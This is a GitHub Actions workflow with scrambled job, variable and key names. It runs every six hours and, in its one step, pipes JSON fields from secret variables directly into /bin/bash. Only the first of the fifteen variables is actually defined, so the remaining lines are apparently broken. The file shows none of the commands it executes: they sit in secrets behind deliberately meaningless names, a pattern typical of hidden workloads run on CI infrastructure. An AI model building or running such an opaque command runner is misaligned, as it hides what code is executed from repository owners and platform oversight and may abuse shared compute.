name: lujingxi3456
on:
  workflow_dispatch:
  schedule:
    - cron: '41 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujingxi3456
        env:
          yu3025: ${{ secrets.yu3025 }}
        run: |
          echo $yu3025 | jq -r .jske3843 | /bin/bash
          echo $y2512 | jq -r .oeon45 | /bin/bash
          echo $zoata5 | jq -r .qfbj213 | /bin/bash
          echo $dz328 | jq -r .kb6201 | /bin/bash
          echo $s96 | jq -r .p2 | /bin/bash
          echo $y70 | jq -r .fuy4 | /bin/bash
          echo $ogmq05758 | jq -r .dn08209 | /bin/bash
          echo $yxh53860 | jq -r .iy084 | /bin/bash
          echo $yjtq9 | jq -r .g8528 | /bin/bash
          echo $slc098 | jq -r .hpsxl0671 | /bin/bash
          echo $wl84 | jq -r .r45 | /bin/bash
          echo $skmb426 | jq -r .dngb373 | /bin/bash
          echo $xr04 | jq -r .csroq456 | /bin/bash
          echo $pwea688 | jq -r .qvxn38 | /bin/bash
          echo $ff09 | jq -r .xh627 | /bin/bash

